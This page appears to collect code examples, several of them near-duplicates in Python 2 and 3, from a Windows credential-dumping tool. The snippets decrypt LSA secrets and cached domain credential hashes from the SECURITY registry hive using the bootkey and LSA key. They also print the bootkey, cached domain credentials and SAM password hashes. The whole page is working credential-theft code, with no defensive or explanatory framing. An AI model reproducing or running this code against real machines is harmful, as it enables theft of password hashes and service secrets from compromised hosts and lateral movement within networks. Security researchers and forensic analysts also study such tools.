Ejemplo n.º 1
0
def get_secrets():
    global xp
    bootkey = get_bootkey()
    lsakey = get_lsa_key(bootkey)
    r = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets")
    if not r.is_present:
        print "[E] Secrets key not accessible: HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets"
        return None

    secrets = {}
    for service_key in r.get_subkeys():
        service_name = service_key.get_name().split("\\")[-1]
        skey = regkey(service_key.get_name() + "\\CurrVal")
        enc_secret = skey.get_value("")
        if not enc_secret:
            continue

        if xp:
            encryptedSecretSize = unpack("<I", enc_secret[:4])[0]
            offset = len(enc_secret) - encryptedSecretSize
            secret = decrypt_secret(enc_secret[offset:], lsakey)
        else:
            secret = decrypt_lsa2(enc_secret, lsakey)
        secrets[service_name] = secret

    return secrets
Ejemplo n.º 2
0
def get_secrets():
    global xp
    bootkey = get_bootkey()
    lsakey = get_lsa_key(bootkey)
    r = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets")
    if not r.is_present:
        print(
            "[E] Secrets key not accessible: HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets"
        )
        return None

    secrets = {}
    for service_key in r.get_subkeys():
        service_name = service_key.get_name().split("\\")[-1]
        skey = regkey(service_key.get_name() + "\\CurrVal")
        enc_secret = skey.get_value("")
        if not enc_secret:
            continue

        if xp:
            encryptedSecretSize = unpack('<I', enc_secret[:4])[0]
            offset = len(enc_secret) - encryptedSecretSize
            secret = decrypt_secret(enc_secret[offset:], lsakey)
        else:
            secret = decrypt_lsa2(enc_secret, lsakey)
        secrets[service_name] = secret

    return secrets
Ejemplo n.º 3
0
def dump_hashes():
    bootkey = get_bootkey()
    if not bootkey:
        return []

    lsakey = get_lsa_key(bootkey)
#    import binascii
#    print "lsakey : %s"%(binascii.hexlify(lsakey))
    if not lsakey:
        return []

    nlkm = get_nlkm(lsakey)
#    print "nlkm : %s"%(binascii.hexlify(nlkm))
    if not nlkm:
        return []

    r = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not r.is_present():
        return []

    hashes = []
    for v in r.get_values():
        if v == "NL$Control": continue
        
        data = r.get_value(v)

        (uname_len, domain_len, domain_name_len, 
            enc_data, ch) = parse_cache_entry(data)
#        print "cache entry encodeddata: %s"%(binascii.hexlify(enc_data))
        # Skip if nothing in this cache entry
        if uname_len == 0:
            continue
        global xp
        xp = isXp()
        if xp:
            dec_data = decrypt_hash(enc_data, nlkm, ch)
        else:
            dec_data = decrypt_hash_vista(enc_data, nlkm, ch)

        (username, domain, domain_name,
            hash) = parse_decrypted_cache(dec_data, uname_len,
                    domain_len, domain_name_len)

        hashes.append((username, domain, domain_name, hash))

    return hashes 
Ejemplo n.º 4
0
def dump_hashes():
    bootkey = get_bootkey()
    if not bootkey:
        return []

    lsakey = get_lsa_key(bootkey)
    if not lsakey:
        return []

    nlkm = get_nlkm(lsakey)
    if not nlkm:
        return []

    r = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not r.is_present():
        return []

    hashes = []
    for v in r.get_values():
        if v == "NL$Control": continue

        data = r.get_value(v)

        (uname_len, domain_len, domain_name_len, enc_data,
         ch) = parse_cache_entry(data)

        # Skip if nothing in this cache entry
        if uname_len == 0:
            continue

        dec_data = decrypt_hash(enc_data, nlkm, ch)

        (username, domain, domain_name,
         hash) = parse_decrypted_cache(dec_data, uname_len, domain_len,
                                       domain_name_len)

        hashes.append((username, domain, domain_name, hash))

    return hashes
Ejemplo n.º 5
0
def dump_hashes():
    bootkey = get_bootkey()
    if not bootkey:
        return []

    lsakey = get_lsa_key(bootkey)
    if not lsakey:
        return []

    nlkm = get_nlkm(lsakey)
    if not nlkm:
        return []

    r = regkey("HKEY_LOCAL_MACHINE\\SECURITY\\Cache")
    if not r.is_present():
        return []

    hashes = []
    for v in r.get_values():
        if v == "NL$Control": continue
        
        data = r.get_value(v)

        (uname_len, domain_len, domain_name_len, 
            enc_data, ch) = parse_cache_entry(data)
        
        # Skip if nothing in this cache entry
        if uname_len == 0:
            continue

        dec_data = decrypt_hash(enc_data, nlkm, ch)

        (username, domain, domain_name,
            hash) = parse_decrypted_cache(dec_data, uname_len,
                    domain_len, domain_name_len)

        hashes.append((username, domain, domain_name, hash))

    return hashes 
Ejemplo n.º 6
0
            if package[k]:
                print "%s:" % k
                sys.stdout.write(dump(package[k], 16))
            else:
                print "%s: %s" % (k, "<empty / cannot decrypt>")
        else:
            print "%s: %s" % (k, package[k])
    print ""


options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
    section("Dumping Bootkey")
    print "Bootkey: %s" % hexlify(get_bootkey())

# cachedump
if options.do_all or options.do_cacheddomcreds:
    section("Dumping Cached Domain Credentials")
    got_a_hash = 0
    for hash in cachedump_reg_hashes():
        got_a_hash = 1
        print hash

    if not got_a_hash:
        print "[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?"

# pwdump
if options.do_all or options.do_samhashes:
    section("Dumping Password Hashes From SAM")
Ejemplo n.º 7
0
            if package[k]:
                print("%s:" % k)
                sys.stdout.write(dump(package[k], 16))
            else:
                print("%s: %s" % (k, "<empty / cannot decrypt>"))
        else:
            print("%s: %s" % (k, package[k]))
    print()


options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
    section("Dumping Bootkey")
    bootkey = get_bootkey()
    print(f"Bootkey: {hexlify(bootkey).decode()}")

# cachedump
if options.do_all or options.do_cacheddomcreds:
    section("Dumping Cached Domain Credentials")
    got_a_hash = 0
    for hash in cachedump_reg_hashes():
        got_a_hash = 1
        print(hash)

    if not got_a_hash:
        print(
            "[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?"
        )
Ejemplo n.º 8
0
		if k == "CredentialBlob":
			if package[k]:
				print "%s:" % k
				sys.stdout.write(dump(package[k], 16))
			else:
				print "%s: %s" % (k, "<empty / cannot decrypt>")
		else:
			print "%s: %s" % (k, package[k])
	print ""
		
options = parseOptions()

# bootkey
if options.do_all or options.do_bootkey:
	section("Dumping Bootkey")
	print "Bootkey: %s" % hexlify(get_bootkey())

# cachedump
if options.do_all or options.do_cacheddomcreds:
	section("Dumping Cached Domain Credentials")
	got_a_hash = 0
	for hash in cachedump_reg_hashes():
		got_a_hash = 1
		print hash	
		
	if not got_a_hash:
		print "[E] No cached hashes. Are you running as SYSTEM? Or machine not a domain member?"

# pwdump
if options.do_all or options.do_samhashes:
	section("Dumping Password Hashes From SAM")